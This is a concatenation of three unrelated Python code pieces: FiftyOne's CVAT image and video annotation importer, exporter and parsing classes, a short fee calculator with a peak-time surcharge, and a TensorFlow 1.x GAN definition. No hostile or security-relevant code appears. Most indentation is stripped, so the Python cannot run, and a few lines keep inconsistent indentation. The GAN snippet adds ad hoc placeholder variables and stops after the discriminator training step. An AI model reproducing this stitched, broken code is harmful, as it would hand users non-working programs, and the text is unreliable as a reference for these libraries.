self._data_dir = os.path.join(self.dataset_dir, "data")
self._labels_path = os.path.join(self.dataset_dir, "labels.xml")
if os.path.isfile(self._labels_path):
info, _, cvat_images = load_cvat_image_annotations(
self._labels_path
)
else:
info = {}
cvat_images = []
self._info = info
# Index by filename
self._images_map = {i.name: i for i in cvat_images}
filenames = etau.list_files(self._data_dir, abs_paths=False)
if self.skip_unlabeled:
filenames = [f for f in filenames if f in self._images_map]
self._filenames = self._preprocess_list(filenames)
self._num_samples = len(self._filenames)
def get_dataset_info(self):
return self._info
class CVATVideoDatasetImporter(foud.LabeledVideoDatasetImporter):
"""Importer for CVAT video datasets stored on disk.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
Args:
dataset_dir: the dataset directory
skip_unlabeled (False): whether to skip unlabeled videos when importing
shuffle (False): whether to randomly shuffle the order in which the
samples are imported
seed (None): a random seed to use when shuffling
max_samples (None): a maximum number of samples to import. By default,
all samples are imported
"""
def __init__(
self,
dataset_dir,
skip_unlabeled=False,
shuffle=False,
seed=None,
max_samples=None,
):
super().__init__(
dataset_dir,
skip_unlabeled=skip_unlabeled,
shuffle=shuffle,
seed=seed,
max_samples=max_samples,
)
self._objects_field = "objects"
self._info = None
self._cvat_task_labels = None
self._uuids_to_video_paths = None
self._uuids_to_labels_paths = None
self._uuids = None
self._iter_uuids = None
self._num_samples = None
def __iter__(self):
self._iter_uuids = iter(self._uuids)
return self
def __len__(self):
return self._num_samples
def __next__(self):
uuid = next(self._iter_uuids)
video_path = self._uuids_to_video_paths[uuid]
labels_path = self._uuids_to_labels_paths.get(uuid, None)
if labels_path:
# Labeled video
info, cvat_task_labels, cvat_tracks = load_cvat_video_annotations(
labels_path
)
if self._info is None:
self._info = info
self._cvat_task_labels.merge_task_labels(cvat_task_labels)
self._info["task_labels"] = self._cvat_task_labels.labels
frames = _cvat_tracks_to_frames(cvat_tracks, self._objects_field)
else:
# Unlabeled video
frames = None
return video_path, None, frames
@property
def has_dataset_info(self):
return True
@property
def has_video_metadata(self):
return False # has (width, height) but not other important info
def setup(self):
to_uuid = lambda p: os.path.splitext(os.path.basename(p))[0]
data_dir = os.path.join(self.dataset_dir, "data")
if os.path.isdir(data_dir):
self._uuids_to_video_paths = {
to_uuid(p): p
for p in etau.list_files(data_dir, abs_paths=True)
}
else:
self._uuids_to_video_paths = {}
labels_dir = os.path.join(self.dataset_dir, "labels")
if os.path.isdir(labels_dir):
self._uuids_to_labels_paths = {
to_uuid(p): p
for p in etau.list_files(labels_dir, abs_paths=True)
}
else:
self._uuids_to_labels_paths = {}
if self.skip_unlabeled:
uuids = sorted(self._uuids_to_labels_paths.keys())
else:
uuids = sorted(self._uuids_to_video_paths.keys())
self._info = None
self._uuids = self._preprocess_list(uuids)
self._num_samples = len(self._uuids)
self._cvat_task_labels = CVATTaskLabels()
def get_dataset_info(self):
return self._info
class CVATImageDatasetExporter(foud.LabeledImageDatasetExporter):
"""Exporter that writes CVAT image datasets to disk.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
Args:
export_dir: the directory to write the export
image_format (None): the image format to use when writing in-memory
images to disk. By default, ``fiftyone.config.default_image_ext``
is used
"""
def __init__(self, export_dir, image_format=None):
if image_format is None:
image_format = fo.config.default_image_ext
super().__init__(export_dir)
self.image_format = image_format
self._name = None
self._task_labels = None
self._data_dir = None
self._labels_path = None
self._cvat_images = None
self._filename_maker = None
@property
def requires_image_metadata(self):
return True
@property
def label_cls(self):
return fol.Detections
def setup(self):
self._data_dir = os.path.join(self.export_dir, "data")
self._labels_path = os.path.join(self.export_dir, "labels.xml")
self._cvat_images = []
self._filename_maker = fou.UniqueFilenameMaker(
output_dir=self._data_dir, default_ext=self.image_format
)
def log_collection(self, sample_collection):
self._name = sample_collection.name
self._task_labels = sample_collection.info.get("task_labels", None)
def export_sample(self, image_or_path, detections, metadata=None):
out_image_path = self._export_image_or_path(
image_or_path, self._filename_maker
)
if detections is None:
return
if metadata is None:
metadata = fom.ImageMetadata.build_for(out_image_path)
cvat_image = CVATImage.from_detections(detections, metadata)
cvat_image.id = len(self._cvat_images)
cvat_image.name = os.path.basename(out_image_path)
self._cvat_images.append(cvat_image)
def close(self, *args):
# Get task labels
if self._task_labels is None:
# Compute task labels from active label schema
cvat_task_labels = CVATTaskLabels.from_cvat_images(
self._cvat_images
)
else:
# Use task labels from logged collection info
cvat_task_labels = CVATTaskLabels(labels=self._task_labels)
# Write annotations
writer = CVATImageAnnotationWriter()
writer.write(
cvat_task_labels,
self._cvat_images,
self._labels_path,
id=0,
name=self._name,
)
class CVATVideoDatasetExporter(foud.LabeledVideoDatasetExporter):
"""Exporter that writes CVAT video datasets to disk.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
Args:
export_dir: the directory to write the export
"""
def __init__(self, export_dir):
super().__init__(export_dir)
self._task_labels = None
self._data_dir = None
self._labels_dir = None
self._filename_maker = None
self._writer = None
self._num_samples = 0
@property
def requires_video_metadata(self):
return True
def setup(self):
self._data_dir = os.path.join(self.export_dir, "data")
self._labels_dir = os.path.join(self.export_dir, "labels")
self._filename_maker = fou.UniqueFilenameMaker(
output_dir=self._data_dir
)
self._writer = CVATVideoAnnotationWriter()
etau.ensure_dir(self._data_dir)
etau.ensure_dir(self._labels_dir)
def log_collection(self, sample_collection):
self._task_labels = sample_collection.info.get("task_labels", None)
def export_sample(self, video_path, frames, metadata=None):
out_video_path = self._export_video(video_path, self._filename_maker)
if frames is None:
return
if metadata is None:
metadata = fom.VideoMetadata.build_for(out_video_path)
name_with_ext = os.path.basename(out_video_path)
name = os.path.splitext(name_with_ext)[0]
out_anno_path = os.path.join(self._labels_dir, name + ".xml")
# Generate object tracks
frame_size = (metadata.frame_width, metadata.frame_height)
cvat_tracks = _frames_to_cvat_tracks(frames, frame_size)
# Get task labels
if self._task_labels is None:
# Compute task labels from active label schema
cvat_task_labels = CVATTaskLabels.from_cvat_tracks(cvat_tracks)
else:
# Use task labels from logged collection info
cvat_task_labels = CVATTaskLabels(labels=self._task_labels)
# Write annotations
self._num_samples += 1
self._writer.write(
cvat_task_labels,
cvat_tracks,
metadata,
out_anno_path,
id=self._num_samples - 1,
name=name_with_ext,
)
class CVATTaskLabels(object):
"""Description of the labels in a CVAT image annotation task.
Args:
labels (None): a list of label dicts in the following format::
[
{
"name": "car",
"attributes": [
{
"name": "type"
"categories": ["coupe", "sedan", "truck"]
},
...
}
},
...
]
"""
def __init__(self, labels=None):
self.labels = labels or []
def merge_task_labels(self, task_labels):
"""Merges the given :class:`CVATTaskLabels` into this instance.
Args:
task_labels: a :class:`CVATTaskLabels`
"""
schema = self.to_schema()
schema.merge_schema(task_labels.to_schema())
new_task_labels = CVATTaskLabels.from_schema(schema)
self.labels = new_task_labels.labels
def to_schema(self):
"""Returns an ``eta.core.image.ImageLabelsSchema`` representation of
the task labels.
Returns:
an ``eta.core.image.ImageLabelsSchema``
"""
schema = etai.ImageLabelsSchema()
for label in self.labels:
_label = label["name"]
schema.add_object_label(_label)
for attribute in label.get("attributes", []):
_name = attribute["name"]
_categories = attribute["categories"]
for _value in _categories:
_attr = etad.CategoricalAttribute(_name, _value)
schema.add_object_attribute(_label, _attr)
return schema
@classmethod
def from_cvat_images(cls, cvat_images):
"""Creates a :class:`CVATTaskLabels` instance that describes the active
schema of the given annotations.
Args:
cvat_images: a list of :class:`CVATImage` instances
Returns:
a :class:`CVATTaskLabels`
"""
schema = etai.ImageLabelsSchema()
for cvat_image in cvat_images:
for box in cvat_image.boxes:
_label = box.label
schema.add_object_label(_label)
if box.occluded is not None:
schema.add_object_attribute("occluded", box.occluded)
for attr in box.attributes:
_attr = attr.to_eta_attribute()
schema.add_object_attribute(_label, _attr)
return cls.from_schema(schema)
@classmethod
def from_cvat_tracks(cls, cvat_tracks):
"""Creates a :class:`CVATTaskLabels` instance that describes the active
schema of the given annotations.
Args:
cvat_tracks: a list of :class:`CVATTrack` instances
Returns:
a :class:`CVATTaskLabels`
"""
schema = etai.ImageLabelsSchema()
for cvat_track in cvat_tracks:
for box in cvat_track.boxes.values():
_label = box.label
schema.add_object_label(_label)
if box.outside is not None:
schema.add_object_attribute("outside", box.outside)
if box.occluded is not None:
schema.add_object_attribute("occluded", box.occluded)
if box.keyframe is not None:
schema.add_object_attribute("keyframe", box.keyframe)
for attr in box.attributes:
_attr = attr.to_eta_attribute()
schema.add_object_attribute(_label, _attr)
return cls.from_schema(schema)
@classmethod
def from_labels_dict(cls, d):
"""Creates a :class:`CVATTaskLabels` instance from the ``<labels>``
tag of a CVAT image annotation XML file.
Args:
d: a dict representation of a ``<labels>`` tag
Returns:
a :class:`CVATTaskLabels`
"""
labels = _ensure_list(d.get("label", []))
_labels = []
for label in labels:
_tmp = label.get("attributes", None) or {}
attributes = _ensure_list(_tmp.get("attribute", []))
_attributes = []
for attribute in attributes:
_attributes.append(
{
"name": attribute["name"],
"categories": attribute["values"].split("\n"),
}
)
_labels.append({"name": label["name"], "attributes": _attributes})
return cls(labels=_labels)
@classmethod
def from_schema(cls, schema):
"""Creates a :class:`CVATTaskLabels` instance from an
``eta.core.image.ImageLabelsSchema``.
Args:
schema: an ``eta.core.image.ImageLabelsSchema``
Returns:
a :class:`CVATTaskLabels`
"""
labels = []
obj_schemas = schema.objects
for label in sorted(obj_schemas.schema):
obj_schema = obj_schemas.schema[label]
obj_attr_schemas = obj_schema.attrs
attributes = []
for name in sorted(obj_attr_schemas.schema):
attr_schema = obj_attr_schemas.schema[name]
if isinstance(attr_schema, etad.CategoricalAttributeSchema):
attributes.append(
{
"name": name,
"categories": sorted(attr_schema.categories),
}
)
labels.append({"name": label, "attributes": attributes})
return cls(labels=labels)
class CVATImage(object):
"""An annotated image in CVAT image format.
Args:
id: the ID of the image
name: the filename of the image
width: the width of the image, in pixels
height: the height of the image, in pixels
boxes (None): a list of :class:`CVATImageBox` instances
"""
def __init__(self, id, name, width, height, boxes=None):
self.id = id
self.name = name
self.width = width
self.height = height
self.boxes = boxes or []
def get_image_metadata(self):
"""Returns a :class:`fiftyone.core.metadata.ImageMetadata` instance for
the annotations.
Returns:
a :class:`fiftyone.core.metadata.ImageMetadata`
"""
return fom.ImageMetadata(width=self.width, height=self.height)
def to_detections(self):
"""Returns a :class:`fiftyone.core.labels.Detections` representation of
the annotations.
Returns:
a :class:`fiftyone.core.labels.Detections`
"""
frame_size = (self.width, self.height)
detections = [box.to_detection(frame_size) for box in self.boxes]
return fol.Detections(detections=detections)
@classmethod
def from_detections(cls, detections, metadata):
"""Creates a :class:`CVATImage` from a
:class:`fiftyone.core.labels.Detections`.
Args:
detections: a :class:`fiftyone.core.labels.Detections`
metadata: a :class:`fiftyone.core.metadata.ImageMetadata` for the
image
Returns:
a :class:`CVATImage`
"""
width = metadata.width
height = metadata.height
boxes = [
CVATImageBox.from_detection(d, metadata)
for d in detections.detections
]
return cls(None, None, width, height, boxes=boxes)
@classmethod
def from_image_dict(cls, d):
"""Creates a :class:`CVATImage` from an ``<image>`` tag of a CVAT image
annotations XML file.
Args:
d: a dict representation of an ``<image>`` tag
Returns:
a :class:`CVATImage`
"""
id = d["@id"]
name = d["@name"]
width = int(d["@width"])
height = int(d["@height"])
boxes = []
for box in _ensure_list(d.get("box", [])):
boxes.append(CVATImageBox.from_box_dict(box))
return cls(id, name, width, height, boxes=boxes)
class CVATImageBox(object):
"""An object bounding box (with attributes) in CVAT image format.
Args:
label: the object label string
xtl: the top-left x-coordinate of the box, in pixels
ytl: the top-left y-coordinate of the box, in pixels
xbr: the bottom-right x-coordinate of the box, in pixels
ybr: the bottom-right y-coordinate of the box, in pixels
occluded (None): whether the object is occluded
attributes (None): a list of :class:`CVATAttribute` instances
"""
def __init__(
self, label, xtl, ytl, xbr, ybr, occluded=None, attributes=None
):
self.label = label
self.xtl = xtl
self.ytl = ytl
self.xbr = xbr
self.ybr = ybr
self.occluded = occluded
self.attributes = attributes or []
def to_detection(self, frame_size):
"""Returns a :class:`fiftyone.core.labels.Detection` representation of
the box.
Args:
frame_size: the ``(width, height)`` of the image
Returns:
a :class:`fiftyone.core.labels.Detection`
"""
label = self.label
width, height = frame_size
bounding_box = [
self.xtl / width,
self.ytl / height,
(self.xbr - self.xtl) / width,
(self.ybr - self.ytl) / height,
]
attributes = {a.name: a.to_attribute() for a in self.attributes}
if self.occluded is not None:
attributes["occluded"] = fol.BooleanAttribute(value=self.occluded)
return fol.Detection(
label=label, bounding_box=bounding_box, attributes=attributes,
)
@classmethod
def from_detection(cls, detection, metadata):
"""Creates a :class:`CVATImageBox` from a
:class:`fiftyone.core.labels.Detection`.
Args:
detection: a :class:`fiftyone.core.labels.Detection`
metadata: a :class:`fiftyone.core.metadata.ImageMetadata` for the
image
Returns:
a :class:`CVATImageBox`
"""
label = detection.label
width = metadata.width
height = metadata.height
x, y, w, h = detection.bounding_box
xtl = int(round(x * width))
ytl = int(round(y * height))
xbr = int(round((x + w) * width))
ybr = int(round((y + h) * height))
occluded = None
if detection.attributes:
supported_attrs = (
fol.BooleanAttribute,
fol.CategoricalAttribute,
fol.NumericAttribute,
)
attributes = []
for name, attr in detection.attributes.items():
if name == "occluded":
occluded = attr.value
elif isinstance(attr, supported_attrs):
attributes.append(CVATAttribute(name, attr.value))
else:
attributes = None
return cls(
label, xtl, ytl, xbr, ybr, occluded=occluded, attributes=attributes
)
@classmethod
def from_box_dict(cls, d):
"""Creates a :class:`CVATImageBox` from a ``<box>`` tag of a CVAT image
annotation XML file.
Args:
d: a dict representation of a ``<box>`` tag
Returns:
a :class:`CVATImageBox`
"""
label = d["@label"]
xtl = int(round(float(d["@xtl"])))
ytl = int(round(float(d["@ytl"])))
xbr = int(round(float(d["@xbr"])))
ybr = int(round(float(d["@ybr"])))
occluded = d.get("@occluded", None)
if occluded is not None:
occluded = bool(int(occluded))
attributes = []
for attr in _ensure_list(d.get("attribute", [])):
name = attr["@name"].lstrip("@")
value = attr["#text"]
            try:
                value = float(value)
            except (TypeError, ValueError):
                # Leave non-numeric attribute values as strings.
                pass
attributes.append(CVATAttribute(name, value))
return cls(
label, xtl, ytl, xbr, ybr, occluded=occluded, attributes=attributes
)
class CVATTrack(object):
"""An annotated object track in CVAT video format.
Args:
id: the ID of the track
label: the label for the track
width: the width of the video frames, in pixels
height: the height of the video frames, in pixels
boxes (None): a dict mapping frame numbers to :class:`CVATVideoBox`
instances
"""
def __init__(self, id, label, width, height, boxes=None):
self.id = id
self.label = label
self.width = width
self.height = height
self.boxes = boxes or {}
def to_detections(self):
"""Returns a :class:`fiftyone.core.labels.Detection` representation of
the annotations.
Returns:
a dictionary mapping frame numbers to
:class:`fiftyone.core.labels.Detection` instances
"""
frame_size = (self.width, self.height)
detections = {}
for frame_number, box in self.boxes.items():
detection = box.to_detection(frame_size)
detection.index = self.id
detections[frame_number] = detection
return detections
@classmethod
def from_detections(cls, id, detections, frame_size):
"""Creates a :class:`CVATTrack` from a dictionary of
:class:`fiftyone.core.labels.Detection` instances.
Args:
id: the ID of the track
detections: a dict mapping frame numbers to
:class:`fiftyone.core.labels.Detection` instances
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`CVATTrack`
"""
width, height = frame_size
boxes = {}
label = None
for frame_number, detection in detections.items():
label = detection.label
boxes[frame_number] = CVATVideoBox.from_detection(
frame_number, detection, frame_size
)
return cls(id, label, width, height, boxes=boxes)
@classmethod
def from_track_dict(cls, d, frame_size):
"""Creates a :class:`CVATTrack` from a ``<track>`` tag of a CVAT video
annotation XML file.
Args:
d: a dict representation of an ``<track>`` tag
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`CVATTrack`
"""
id = d["@id"]
label = d["@label"]
width, height = frame_size
boxes = {}
for box_dict in _ensure_list(d.get("box", [])):
box = CVATVideoBox.from_box_dict(label, box_dict)
boxes[box.frame] = box
return cls(id, label, width, height, boxes=boxes)
class CVATVideoBox(object):
"""An object bounding box (with attributes) in CVAT video format.
Args:
frame: the frame number
label: the object label string
xtl: the top-left x-coordinate of the box, in pixels
ytl: the top-left y-coordinate of the box, in pixels
xbr: the bottom-right x-coordinate of the box, in pixels
ybr: the bottom-right y-coordinate of the box, in pixels
outside (None): whether the object is truncated by the frame edge
occluded (None): whether the object is occluded
keyframe (None): whether the frame is a key frame
attributes (None): a list of :class:`CVATAttribute` instances
"""
def __init__(
self,
frame,
label,
xtl,
ytl,
xbr,
ybr,
outside=None,
occluded=None,
keyframe=None,
attributes=None,
):
self.frame = frame
self.label = label
self.xtl = xtl
self.ytl = ytl
self.xbr = xbr
self.ybr = ybr
self.outside = outside
self.occluded = occluded
self.keyframe = keyframe
self.attributes = attributes or []
def to_detection(self, frame_size):
"""Returns a :class:`fiftyone.core.labels.Detection` representation of
the box.
Args:
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`fiftyone.core.labels.Detection`
"""
label = self.label
width, height = frame_size
bounding_box = [
self.xtl / width,
self.ytl / height,
(self.xbr - self.xtl) / width,
(self.ybr - self.ytl) / height,
]
attributes = {a.name: a.to_attribute() for a in self.attributes}
if self.outside is not None:
attributes["outside"] = fol.BooleanAttribute(value=self.outside)
if self.occluded is not None:
attributes["occluded"] = fol.BooleanAttribute(value=self.occluded)
if self.keyframe is not None:
attributes["keyframe"] = fol.BooleanAttribute(value=self.keyframe)
return fol.Detection(
label=label, bounding_box=bounding_box, attributes=attributes,
)
@classmethod
def from_detection(cls, frame_number, detection, frame_size):
"""Creates a :class:`CVATVideoBox` from a
:class:`fiftyone.core.labels.Detection`.
Args:
frame_number: the frame number
detection: a :class:`fiftyone.core.labels.Detection`
frame_size: the ``(width, height)`` of the video frames
Returns:
a :class:`CVATVideoBox`
"""
label = detection.label
width, height = frame_size
x, y, w, h = detection.bounding_box
xtl = int(round(x * width))
ytl = int(round(y * height))
xbr = int(round((x + w) * width))
ybr = int(round((y + h) * height))
outside = None
occluded = None
keyframe = None
if detection.attributes:
supported_attrs = (
fol.BooleanAttribute,
fol.CategoricalAttribute,
fol.NumericAttribute,
)
attributes = []
for name, attr in detection.attributes.items():
if name == "outside":
outside = attr.value
elif name == "occluded":
occluded = attr.value
elif name == "keyframe":
keyframe = attr.value
elif isinstance(attr, supported_attrs):
attributes.append(CVATAttribute(name, attr.value))
else:
attributes = None
return cls(
frame_number,
label,
xtl,
ytl,
xbr,
ybr,
outside=outside,
occluded=occluded,
keyframe=keyframe,
attributes=attributes,
)
@classmethod
def from_box_dict(cls, label, d):
"""Creates a :class:`CVATVideoBox` from a ``<box>`` tag of a CVAT video
annotation XML file.
Args:
label: the object label
d: a dict representation of a ``<box>`` tag
Returns:
a :class:`CVATVideoBox`
"""
frame = int(d["@frame"])
xtl = int(round(float(d["@xtl"])))
ytl = int(round(float(d["@ytl"])))
xbr = int(round(float(d["@xbr"])))
ybr = int(round(float(d["@ybr"])))
outside = d.get("@outside", None)
if outside is not None:
outside = bool(int(outside))
occluded = d.get("@occluded", None)
if occluded is not None:
occluded = bool(int(occluded))
keyframe = d.get("@keyframe", None)
if keyframe is not None:
keyframe = bool(int(keyframe))
attributes = []
for attr in _ensure_list(d.get("attribute", [])):
name = attr["@name"].lstrip("@")
value = attr["#text"]
try:
value = float(value)
            except ValueError:
                # non-numeric attribute values remain strings
                pass
attributes.append(CVATAttribute(name, value))
return cls(
frame,
label,
xtl,
ytl,
xbr,
ybr,
outside=outside,
occluded=occluded,
keyframe=keyframe,
attributes=attributes,
)
class CVATAttribute(object):
"""An attribute in CVAT image format.
Args:
name: the attribute name
value: the attribute value
"""
def __init__(self, name, value):
self.name = name
self.value = value
def to_eta_attribute(self):
"""Returns an ``eta.core.data.Attribute`` representation of the
attribute.
Returns:
an ``eta.core.data.Attribute``
"""
if isinstance(self.value, bool):
return etad.BooleanAttribute(self.name, self.value)
if etau.is_numeric(self.value):
return etad.NumericAttribute(self.name, self.value)
return etad.CategoricalAttribute(self.name, self.value)
def to_attribute(self):
"""Returns a :class:`fiftyone.core.labels.Attribute` representation of
the attribute.
Returns:
a :class:`fiftyone.core.labels.Attribute`
"""
if isinstance(self.value, bool):
return fol.BooleanAttribute(value=self.value)
if etau.is_numeric(self.value):
return fol.NumericAttribute(value=self.value)
return fol.CategoricalAttribute(value=self.value)
class CVATImageAnnotationWriter(object):
"""Class for writing annotations in CVAT image format.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
"""
def __init__(self):
environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(foc.RESOURCES_DIR),
trim_blocks=True,
lstrip_blocks=True,
)
self.template = environment.get_template(
"cvat_image_annotation_template.xml"
)
def write(
self, cvat_task_labels, cvat_images, xml_path, id=None, name=None
):
"""Writes the annotations to disk.
Args:
cvat_task_labels: a :class:`CVATTaskLabels` instance
cvat_images: a list of :class:`CVATImage` instances
xml_path: the path to write the annotations XML file
id (None): an ID for the task
name (None): a name for the task
"""
now = datetime.now().isoformat()
xml_str = self.template.render(
{
"id": id if id is not None else "",
"name": name if name is not None else "",
"size": len(cvat_images),
"created": now,
"updated": now,
"labels": cvat_task_labels.labels,
"dumped": now,
"images": cvat_images,
}
)
etau.write_file(xml_str, xml_path)
class CVATVideoAnnotationWriter(object):
"""Class for writing annotations in CVAT video format.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
"""
def __init__(self):
environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(foc.RESOURCES_DIR),
trim_blocks=True,
lstrip_blocks=True,
)
self.template = environment.get_template(
"cvat_video_interpolation_template.xml"
)
def write(
self,
cvat_task_labels,
cvat_tracks,
metadata,
xml_path,
id=None,
name=None,
):
"""Writes the annotations to disk.
Args:
cvat_task_labels: a :class:`CVATTaskLabels` instance
cvat_tracks: a list of :class:`CVATTrack` instances
metadata: the :class:`fiftyone.core.metadata.VideoMetadata`
instance for the video
xml_path: the path to write the annotations XML file
id (None): an ID for the task
name (None): a name for the task
"""
now = datetime.now().isoformat()
xml_str = self.template.render(
{
"id": id if id is not None else "",
"name": name if name is not None else "",
"size": metadata.total_frame_count,
"created": now,
"updated": now,
"width": metadata.frame_width,
"height": metadata.frame_height,
"labels": cvat_task_labels.labels,
"dumped": now,
"tracks": cvat_tracks,
}
)
etau.write_file(xml_str, xml_path)
def load_cvat_image_annotations(xml_path):
"""Loads the CVAT image annotations from the given XML file.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
Args:
xml_path: the path to the annotations XML file
Returns:
a tuple of
- info: a dict of dataset info
- cvat_task_labels: a :class:`CVATTaskLabels` instance
- cvat_images: a list of :class:`CVATImage` instances
"""
d = fou.load_xml_as_json_dict(xml_path)
annotations = d.get("annotations", {})
# Verify version
version = annotations.get("version", None)
if version is None:
logger.warning("No version tag found; assuming version 1.1")
elif version != "1.1":
logger.warning(
"Only version 1.1 is explicitly supported; found %s. Trying to "
"load assuming version 1.1 format",
version,
)
# Load meta
meta = annotations.get("meta", {})
# Load task labels
task = meta.get("task", {})
labels_dict = task.get("labels", {})
cvat_task_labels = CVATTaskLabels.from_labels_dict(labels_dict)
# Load annotations
image_dicts = _ensure_list(annotations.get("image", []))
cvat_images = [CVATImage.from_image_dict(id) for id in image_dicts]
# Load dataset info
info = {"task_labels": cvat_task_labels.labels}
if "created" in task:
info["created"] = task["created"]
if "updated" in task:
info["updated"] = task["updated"]
if "dumped" in meta:
info["dumped"] = meta["dumped"]
return info, cvat_task_labels, cvat_images
def load_cvat_video_annotations(xml_path):
"""Loads the CVAT video annotations from the given XML file.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
Args:
xml_path: the path to the annotations XML file
Returns:
a tuple of
- info: a dict of dataset info
- cvat_task_labels: a :class:`CVATTaskLabels` instance
- cvat_tracks: a list of :class:`CVATTrack` instances
"""
d = fou.load_xml_as_json_dict(xml_path)
annotations = d.get("annotations", {})
# Verify version
version = annotations.get("version", None)
if version is None:
logger.warning("No version tag found; assuming version 1.1")
elif version != "1.1":
logger.warning(
"Only version 1.1 is explicitly supported; found %s. Trying to "
"load assuming version 1.1 format",
version,
)
# Load meta
meta = annotations.get("meta", {})
# Load task labels
task = meta.get("task", {})
labels_dict = task.get("labels", {})
cvat_task_labels = CVATTaskLabels.from_labels_dict(labels_dict)
# Load annotations
track_dicts = _ensure_list(annotations.get("track", []))
if track_dicts:
original_size = task["original_size"]
frame_size = (
int(original_size["width"]),
int(original_size["height"]),
)
cvat_tracks = [
CVATTrack.from_track_dict(td, frame_size) for td in track_dicts
]
else:
cvat_tracks = []
# Load dataset info
info = {"task_labels": cvat_task_labels.labels}
if "created" in task:
info["created"] = task["created"]
if "updated" in task:
info["updated"] = task["updated"]
if "dumped" in meta:
info["dumped"] = meta["dumped"]
return info, cvat_task_labels, cvat_tracks
def _cvat_tracks_to_frames(cvat_tracks, objects_field):
frames = {}
for cvat_track in cvat_tracks:
detections = cvat_track.to_detections()
for frame_number, detection in detections.items():
if frame_number not in frames:
frame = fof.Frame()
frame[objects_field] = fol.Detections()
frames[frame_number] = frame
else:
frame = frames[frame_number]
frame[objects_field].detections.append(detection)
return frames
def _frames_to_cvat_tracks(frames, frame_size):
no_index_map = defaultdict(list)
detections_map = defaultdict(dict)
def process_detection(detection, frame_number):
if detection.index is not None:
detections_map[detection.index][frame_number] = detection
else:
no_index_map[frame_number].append(detection)
# Convert from per-frame to per-object tracks
for frame_number, frame in frames.items():
for _, value in frame.iter_fields():
if isinstance(value, fol.Detection):
process_detection(value, frame_number)
elif isinstance(value, fol.Detections):
for detection in value.detections:
process_detection(detection, frame_number)
cvat_tracks = []
# Generate object tracks
max_index = -1
for index in sorted(detections_map):
max_index = max(index, max_index)
detections = detections_map[index]
cvat_track = CVATTrack.from_detections(index, detections, frame_size)
cvat_tracks.append(cvat_track)
# Generate single tracks for detections with no `index`
index = max_index
for frame_number, detections in no_index_map.items():
for detection in detections:
index += 1
cvat_track = CVATTrack.from_detections(
index, {frame_number: detection}, frame_size
)
cvat_tracks.append(cvat_track)
return cvat_tracks
def _ensure_list(value):
if value is None:
return []
if isinstance(value, list):
return value
return [value]
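# A minimal usage sketch (an assumption, not part of the module above): parse a
# hypothetical ``<box>`` dict with the classes defined here and round-trip it
# through a FiftyOne Detection. The coordinate values and the helper name
# ``_example_cvat_roundtrip`` are purely illustrative.
def _example_cvat_roundtrip():
    box_dict = {
        "@label": "car",
        "@xtl": "10.0",
        "@ytl": "20.0",
        "@xbr": "110.0",
        "@ybr": "70.0",
        "@occluded": "0",
    }
    cvat_box = CVATImageBox.from_box_dict(box_dict)
    # Convert to a relative-coordinate Detection for a 640x480 image
    detection = cvat_box.to_detection((640, 480))
    print(detection.label, detection.bounding_box)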
|
#take user inputs for time period
timePeriod = input("Time Period : ")
timePeriod = float(timePeriod)
#take user inputs for number of times
noOfTimes = input("Number of times : ")
noOfTimes = float(noOfTimes)
#take user inputs for peak time feature
peakTime = input("Peak time (Y /N) : ")
while peakTime != "Y" and peakTime != "y" and peakTime != "N" and peakTime != "n":
print("Invalid Input! Try again!! " + peakTime)
peakTime = input("Peak time (Y /N) : ")
#calculate basic price
if timePeriod > 60:
total = 25000 * noOfTimes
elif timePeriod >= 45:
total = 12000 * noOfTimes
else:
total = 7500 * noOfTimes
#calculate and add extra fee for peak time
if peakTime == "Y" or peakTime == "y":
total = total * 120 / 100
#print output
print("Total amount to be paid : " + str(total))
|
import tensorflow as tf
def discriminator(x):
with tf.variable_scope("discriminator"):
fc1 = tf.layers.dense(inputs=x, units=256, activation=tf.nn.leaky_relu)
fc2 = tf.layers.dense(inputs=fc1, units=256, activation=tf.nn.leaky_relu)
logits = tf.layers.dense(inputs=fc2, units=1)
return logits
def generator(z):
with tf.variable_scope("generator"):
fc1 = tf.layers.dense(inputs=z, units=1024, activation=tf.nn.relu)
fc2 = tf.layers.dense(inputs=fc1, units=1024, activation=tf.nn.relu)
img = tf.layers.dense(inputs=fc2, units=784, activation=tf.nn.tanh)
return img
def gan_loss(logits_real, logits_fake):
# Target label vectors for generator and discriminator losses.
true_labels = tf.ones_like(logits_real)
fake_labels = tf.zeros_like(logits_fake)
# DISCRIMINATOR loss has 2 parts: how well it classifies real images and how well it
# classifies fake images.
real_image_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_real, labels=true_labels)
fake_image_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_fake, labels=fake_labels)
# Combine and average losses over the batch
discriminator_loss = tf.reduce_mean(real_image_loss + fake_image_loss)
# GENERATOR is trying to make the discriminator output 1 for all its images.
# So we use our target label vector of ones for computing generator loss.
generator_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_fake, labels=true_labels)
# Average generator loss over the batch.
    generator_loss = tf.reduce_mean(generator_loss)
    return discriminator_loss, generator_loss
# Hyperparameters and input placeholder (assumed values; these names are used
# below but were not defined in the snippet).
batch_size = 128
dim = 96  # dimension of the noise vector z
x = tf.placeholder(tf.float32, shape=[None, 784])  # flattened 28x28 input images
discriminator_solver = tf.train.AdamOptimizer(learning_rate=0.001, beta1=0.5)
generator_solver = tf.train.AdamOptimizer(learning_rate=0.001, beta1=0.5)
z = tf.random_uniform(maxval=1, minval=-1, shape=[batch_size, dim])
generator_sample = generator(z)
with tf.variable_scope("") as scope:
logits_real = discriminator(x)
# Re-use discriminator weights
scope.reuse_variables()
logits_fake = discriminator(generator_sample)
discriminator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'discriminator')
generator_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'generator')
discriminator_loss, generator_loss = gan_loss(logits_real, logits_fake)
# Training steps
discriminator_train_step = discriminator_solver.minimize(discriminator_loss, var_list=discriminator_vars )
